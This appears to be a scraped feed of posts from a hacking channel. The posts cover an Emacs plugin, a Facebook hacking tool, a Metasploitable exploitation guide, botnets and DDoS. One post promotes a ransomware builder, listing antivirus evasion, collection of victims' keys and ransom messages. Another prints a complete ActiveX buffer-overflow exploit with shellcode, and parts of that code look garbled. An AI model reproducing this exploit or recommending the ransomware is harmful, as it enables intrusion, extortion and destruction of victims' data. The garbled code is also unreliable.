UNDERCODE COMMUNITY

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automate your work : Evil operator for evaluating codes, translating text,
taking notes, searching via google, etc.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/Dewdrops/evil-extra-operator.git

2) cd evil-extra-operator

3) ;; change default key bindings (if you want) HERE
;; (setq evil-extra-operator-eval-key (kbd "ge"))
(require 'evil-extra-operator)
(global-evil-extra-operator-mode 1)

4) The key binding customization must be placed BEFORE (require 'evil-extra-operator).

5) Or you can just choose what commands you need and bind them yourself:

6) (require 'evil-extra-operator)
(define-key evil-motion-state-map "gr" 'evil-operator-eval)
(define-key evil-motion-state-map "g'" 'evil-operator-google-translate)

Commands and default bindings

1) gr (evil-operator-eval)

Operator for evaluating code, i.e., use grip to evaluate current paragraph, grr to evaluate current line, or if you are in visual state, gr to evaluate current active region. You can customize option evil-extra-operator-eval-modes-alist to let evil-operator-eval support more language. Example:

(setq evil-extra-operator-eval-modes-alist
'((ruby-mode ruby-send-region)
(enh-ruby-mode ruby-send-region)))

2) gG (evil-operator-google-search)

Operator to search the web via google.

g. (evil-operator-google-translate)

3) Operator to translate text via google translate. To use this command, you should have google-translate installed.

gh (evil-operator-highlight)

4) Operator to highlight region. To use this command, you should have highlight.el installed. You can use hlt-eraser-mouse or hlt-eraser which are provided by highlight.el to erase highlighted area.

gs (evil-operator-fold)

5) Operator to fold region. To use this command, you should have fold-this.el installed. You can use fold-this-unfold-at-point or fold-this-unfold-all which are provided by fold-this.el for unfolding.

go (evil-operator-org-capture)

6) Operator form of org-capture. So you can use goip to capture current paragraph.

gR (evil-operator-remember)

7) Like evil-operator-org-capture, but use remember-region instead of org-capture.

No default binding (evil-operator-query-replace)

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

GitHub

Dewdrops/evil-extra-operator

Evil operator for evaluating codes, translating text, taking notes, searching via google, etc. - Dewdrops/evil-extra-operator

267 views18:37

UNDERCODE COMMUNITY

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FACEBOOK PENTESTING :

The New version OFFICIAL FBHT V3

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) download or clone

https://github.com/chinoogawa/fbht/archive/V3.0.zip

https://github.com/chinoogawa/fbht/archive/V3.0.tar.gz

2) fbht$:- python setup.py

/usr/lib/python2.7/distutils/dist.py:267

3) usage: setup.py [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]
or: setup.py --help [cmd1 cmd2 ...]
or: setup.py --help-commands
or: setup.py cmd --help

R E Q U I R E M E N T S :

Selenium

Matplotlib-1.2.1

Networkx-1.8.1

Numpy-1.7.1

Pygraphviz-1.1

Simplejson-3.3.0

Mechanize-0.2.5

Other: gephi-0.8.2-beta (Graphs software)

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

311 views19:37

UNDERCODE COMMUNITY

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NUCLEAR RANSOMWARE :)new update/more features
F E A T U R E S :

Generate a ransomware payload
With or without GUI payload

FUD (Fully Undetectable by Anti-Virus)

Works on Windows, MacOS and Linux

Super fast encryption with PyCrypto

Compile to EXE, APP or Unix/Linux executable

Custom icon for your EXE payload

Receive keys of victims

Decrypt files

Demo mode (payload won't encrypt anything)

Fullscreen mode (Warning takes over the screen)

Custom warning message for your victim

Custom image in your payload

Ghost mode (Rename by adding .DEMON extention instead
of encrypting the files)

Multiple encryption methods

Select file extentions to target

Decide if payload should self-destruct (Console mode feature
only)

Decide wich drive to target for encryption (working directory)

Verified server access through port forwarding VPN

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/leonv024/RAASNet.git

2) pip3 install -r requirements.txt

3) python3 RAASNet.py

On Linux, you might need to install these packages:

4) sudo apt install python3-tk python3-pil python3-pil.imagetk

5) Testing connection with remote server:

6) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989

7) python3 test_socket.py

8)video https://github.com/leonv024/RAASNet/blob/master/demo/PyCrypto-vs-PyAES_demo_10fps.gif

U S E F O R L E A R N
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

326 views20:42

UNDERCODE COMMUNITY

Guide on Metasploitable 2.pdf

2.4 MB

Exploiting Port 22 SSH Bruteforce Port 22 SSH (RSA Method)

Exploiting port 23 TELNET (Credential Capture) Exploiting

TELNET (Bruteforce) Port 25 SMTP User Enumeration

Exploiting Port 80 (PHP) Exploiting Port 139 & 445 (Samba)

Exploiting Port 8080 (Java) Exploiting Port 5432 (Postgres)

Exploiting Port 6667 (UnrealIRCD) Exploiting Port 36255

Remote Login Exploitation Remote Shell Exploitation

Exploiting Port 8787 Bindshell Exploiting Port 5900 (VNC)

Access Port 2121 (ProFTPD) Exploiting Port 8180 (Apache

Tomcat) Privilege Escalation via NFS Exploiting Port 3306 (MYSQL)

Network Scan Exploiting Port 21 FTP (Hydra) Exploiting VSFTPD 2.3.4

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

379 views21:49

UNDERCODE COMMUNITY

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit :

<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

279 views00:40

UNDERCODE COMMUNITY

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BOTNET FOR BEGINERS :

A) What is a botnet?
A trash can with fill sensors, a video surveillance system with a recording function, a smart TV Box - all these devices connect IoT technologies. All devices are connected to the network, so data transfer is carried out without human intervention.

> A botnet is a chain of many devices connected to the Internet. Thus, hackers infect each device with malware, which allows them to maintain complete control over them.

> Cybercriminals use botnets to target Internet sites. Using a botnet, cybercriminals can steal people's data or gain unauthorized access. The most common use of botnets is through DDoS attacks.

B) Cyber attacks: how to launch them via botnets?
The launch scheme is similar to a regular DDoS attack. However, hackers do not infect users' computers, but their IoT devices. Most modern devices have at least some vulnerabilities, for example, when the owners do not change the default password. Cybercriminals simply connect to poorly secured devices and create a botnet. Thus, the owners of botnets have access to several thousand devices simultaneously, which enables them to conduct cyber attacks.

C) The most famous attacks through botnets
Many cyberattacks have made history, and among them there are several interventions through botnets. The first largest botnet was Mirai. Cybersecurity experts discovered it in September 2016. The initial reason for the infection of gadgets was the default passwords set by manufacturers on the devices they produced. Brian Krebs' website was the first victim of the attack. Brian Krebs is a journalist who previously wrote about botnets. Then the cybercriminals chose the DNS operator American Dyn as the next target. The world's largest websites stopped working due to this interference (you can read more about this in this article). Also, using Mirai, hackers attacked the European host OVH. Further device infections are estimated that the original botnet infected nearly half a million IoT devices.

D) Another botnet was Reaper, also known as IoTroop. It was first used for attacks in the fall of 2017. Devices were hacked very quickly, even faster than it was with Mirai. Not only poorly protected devices with default passwords are infected, but also devices from well-known manufacturers (for example, D-Link). Subsequently, the botnet was used by cybercriminals who directed the attack on large European banks.

E) How many devices do you need for a DDoS attack?
For a successful cyber attack, tens of thousands of devices must be connected. The specific number of bots will vary depending on the cybercrime ability to infect unprotected devices.

Akamai gives interesting statistics. So, in 2016, several customers of the company suffered from a cyber attack from 13 thousand devices. It was enough to send almost 270 thousand requests per hour. In a DDoS attack in 2017, hackers attacked one of Akamai's customers via a network of more than 75,000 bots.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

286 views01:40

UNDERCODE COMMUNITY

red_team_course.txt

155.7 KB

279 views02:40

About

Blog

Apps

Platform